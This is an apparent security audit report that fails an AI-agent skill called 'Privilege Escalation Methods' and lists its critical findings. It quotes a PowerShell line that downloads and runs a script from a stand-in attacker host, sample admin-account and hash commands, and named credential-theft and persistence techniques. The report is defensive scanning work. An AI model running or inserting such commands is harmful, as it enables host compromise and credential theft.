Privilege Escalation Methods
Fail
Audited by Snyk on Mar 10, 2026
Risk Level: CRITICAL
Full Analysis
HIGH W007: Insecure credential handling detected in skill instructions.
- Insecure credential handling detected (high risk: 1.00). This skill includes and instructs use of plaintext credentials and secret hashes directly in commands and examples (e.g., user:password, Password123, /rc4:<NTLM_HASH>, net user Administrator Password!@#), meaning an agent would need to accept and emit secret values verbatim — creating a high exfiltration risk.
CRITICAL E005: Suspicious download URL detected in skill instructions.
- Suspicious download URL detected (high risk: 1.00). The facebook.com link is benign by itself, but the presence of http://attacker/shell.ps1 — a direct, untrusted PowerShell (.ps1) file served over plain HTTP from an attacker-controlled host — is a clear high-risk malware distribution indicator, so the overall set is suspicious.
CRITICAL E006: Malicious code pattern detected in skill scripts.
- Malicious code pattern detected (high risk: 1.00). The document explicitly instructs step-by-step post‑exploitation techniques — privilege escalation, credential harvesting (Mimikatz, Kerberoasting, NTLM relays), persistence (setuid shells, cron, scheduled tasks), remote code execution and domain compromise — which are deliberate malicious behaviors and backdoor patterns.
MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).
- Potentially malicious external URL detected (high risk: 1.00). The skill contains a scheduled-task example that runs PowerShell with "iex (iwr http://attacker/shell.ps1)", which at runtime fetches and immediately executes remote code from http://attacker/shell.ps1.
MEDIUM W013: Attempt to modify system services in skill instructions.
- Attempt to modify system services in skill instructions detected (high risk: 1.00). The skill explicitly instructs the agent to perform privilege escalation (e.g., setuid binaries, chmod +s, modify cron/system services, create scheduled tasks and new users, load drivers, extract credentials and create persistence), which directly modifies system state and encourages compromising the host.